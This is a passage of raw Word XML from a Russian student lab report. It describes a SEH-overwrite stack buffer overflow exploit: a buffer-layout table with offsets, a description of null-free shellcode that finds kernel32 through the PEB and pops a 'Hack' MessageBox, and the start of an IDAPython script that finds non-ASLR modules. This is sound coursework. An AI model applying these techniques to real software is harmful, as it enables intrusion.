          <w:p w14:paraId="21EA7784" w14:textId="78E3F92D" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00BE0EE6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SEH: pop pop ret </w:t>
            </w:r>
            <w:r>
              <w:t>из</w:t>
            </w:r>
            <w:r w:rsidRPr="00BE0EE6">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>func.dll</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AF7C68A" w14:textId="584014AC" w:rsidR="00B06DF1" w:rsidRDefault="00BE0EE6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Offset 3332</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B06DF1" w14:paraId="54CB60D6" w14:textId="77777777" w:rsidTr="00B06DF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6336EDBB" w14:textId="15CEDA83" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00BE0EE6" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Трамплин (15 байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D4B1758" w14:textId="7A58D53D" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00BE0EE6" w:rsidP="0040720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Offset 3336</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B06DF1" w14:paraId="00B850E7" w14:textId="77777777" w:rsidTr="00B06DF1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="194ED1BA" w14:textId="5AF76273" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00BE0EE6" w:rsidP="00407203">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">\x90 (27 </w:t>
            </w:r>
            <w:r>
              <w:t>байт)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4927" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FD09A31" w14:textId="153FB25C" w:rsidR="00B06DF1" w:rsidRPr="00BE0EE6" w:rsidRDefault="00BE0EE6" w:rsidP="00BE0EE6">
            <w:pPr>
              <w:keepNext/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>О</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ffset 3351</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EE062AB" w14:textId="7B11CD55" w:rsidR="00407203" w:rsidRDefault="00BE0EE6" w:rsidP="00BE0EE6">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Таблица \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE0EE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Состояние буфера в стеке</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF4237" w14:textId="4C6C5107" w:rsidR="00416838" w:rsidRPr="00416838" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:r>
        <w:t xml:space="preserve">С листингом </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>скрипта, строящим трамплин и вписывающим шеллкод в файл конфига можно ознакомиться в Приложении 4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C50D5" w14:textId="7A0E3C5E" w:rsidR="00416838" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:r>
        <w:t xml:space="preserve">Шеллкод написан на ассемблере и собран в бинарный файл с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fasm</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Важным нюансом было отсутствие нулей в шеллкоде, так как на терминальном символе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve">() </w:t>
      </w:r>
      <w:r>
        <w:t>закончила бы свое выполнения. Общий поток выполнения шеллкода выглядит следующим образом</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">сначала идет пролог (сохранение состояния регистров и выделение памяти на стеки для локальных переменных), затем через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ищется адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">FS </w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>- сегментный регистр, который в Windows всегда указывает на T</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">EB (Thread Environment Block) </w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve">- структуру, описывающую текущий поток. По смещению +0x30 в TEB лежит указатель на </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PEB (Process Environment Block), где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – третий элемент списка. Затем в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">парсится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Export</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для поиска </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">по имени и получения ее адреса. Далее по той же логике находится адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Далее выполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ищется адрес </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBoxA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, в которую затем вкладываются нужные параметры (строки </w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hack</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t>”)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а затем вызывается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00416838">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с кодом 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2ECD86" w14:textId="3FC6EAD8" w:rsidR="00416838" w:rsidRDefault="00416838" w:rsidP="00416838">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>С листингом ассемблерного кода можно ознакомиться в Приложении 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C2E78" w14:textId="0AB0D1DB" w:rsidR="00447612" w:rsidRDefault="00447612" w:rsidP="00447612">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Тестирование</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F7089" w14:textId="7025AF4D" w:rsidR="00447612" w:rsidRPr="00447612" w:rsidRDefault="00447612" w:rsidP="00447612">
      <w:r>
        <w:t xml:space="preserve">В результате запуска программы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ImmunityDebugger</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(см. рисунок 5) или через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. рисунок 6) появляется окно </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738125BD" w14:textId="77777777" w:rsidR="00447612" w:rsidRDefault="001E6E17" w:rsidP="00447612">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E6E17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72165DB2" wp14:editId="6F62DE85">
            <wp:extent cx="5198475" cy="276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9534" cy="27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4C00" w14:textId="099FF5EC" w:rsidR="003F3080" w:rsidRPr="00B27B02" w:rsidRDefault="00447612" w:rsidP="00447612">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0044761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47612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Результат запуска программы в </w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA114F" w14:textId="77777777" w:rsidR="00447612" w:rsidRPr="00B27B02" w:rsidRDefault="00447612" w:rsidP="00447612"/>
    <w:p w14:paraId="12E93117" w14:textId="77777777" w:rsidR="00447612" w:rsidRDefault="001E6E17" w:rsidP="00447612">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001E6E17">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05BE799D" wp14:editId="0EFC7972">
            <wp:extent cx="5334000" cy="27389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132" cy="273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2831" w14:textId="6A1A313D" w:rsidR="001E6E17" w:rsidRPr="00B27B02" w:rsidRDefault="00447612" w:rsidP="00447612">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="0044761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47612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Результат запуска программы в </w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DFD5CB" w14:textId="0B0E5054" w:rsidR="00447612" w:rsidRPr="00447612" w:rsidRDefault="00447612" w:rsidP="00447612">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Вывод</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70F569" w14:textId="70A61C1E" w:rsidR="00447612" w:rsidRPr="00447612" w:rsidRDefault="00447612" w:rsidP="00447612">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>В ходе лабораторной работы были изучены способы</w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплуатации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимостей и механизмов противодействия</w:t>
      </w:r>
      <w:r w:rsidRPr="00E33B88">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Была освоены техники экспулатации уязвимостей </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esep</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612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SHE</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Overwrite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, последнюю получилось реализовать на практике. В результате был создан конфигурационный файл, при запуске целевой программы с которым, получается проэкспулатировать уязвимость переполнения буфера на стеке и вызвать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MessageBox</w:t>
      </w:r>
      <w:r w:rsidRPr="00447612">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F3770" w14:textId="77777777" w:rsidR="00416838" w:rsidRDefault="00416838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487E0052" w14:textId="3295306B" w:rsidR="00A96E2A" w:rsidRDefault="00A96E2A" w:rsidP="00A96E2A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606FB6C" w14:textId="43BB69E4" w:rsidR="00A96E2A" w:rsidRDefault="00A96E2A" w:rsidP="00E02D80">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Код </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IDAPython</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-скрипта для поиска модулей без поддержки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96E2A">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C21080C" w14:textId="4E2E154D" w:rsidR="00127358" w:rsidRDefault="00E02D80" w:rsidP="00E02D80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import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:t>struct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idautils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ida_idd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">ASLR_FLAG = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1750EB"/>
        </w:rPr>
        <w:t>0x0040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"Loaded modules:"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m </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0033B3"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:t>idautils.Modules():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    name = m.name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    base = m.base </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
        </w:rPr>
        <w:t># базовый адрес, по которому модуль загружен в память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 xml:space="preserve">mz = ida_idd.dbg_read_memory(base, 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 xml:space="preserve">mz != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="8A822D"/>
        </w:rPr>
        <w:t>b"MZ"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>continue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0033B3"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:t xml:space="preserve">e_lfanew_data = ida_idd.dbg_read_memory(base + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1750EB"/>
        </w:rPr>
        <w:t>0x3C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1750EB"/>
        </w:rPr>
        <w:t>4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># указатель на начало PE-заголовка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80808"/>
        </w:rPr>
        <w:t xml:space="preserve">e_lfanew_data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0033B3"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="080808"/>
        </w:rPr>
        <w:t xml:space="preserve">(e_lfanew_data) != </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="1750EB"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>continue</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="0033B3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="080808"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e_lfanew = struct.unpack(</w:t>
      </w:r>
      <w:r w:rsidRPr="00E02D80">
        <w:rPr>
          <w:color w:val="067D17"/>
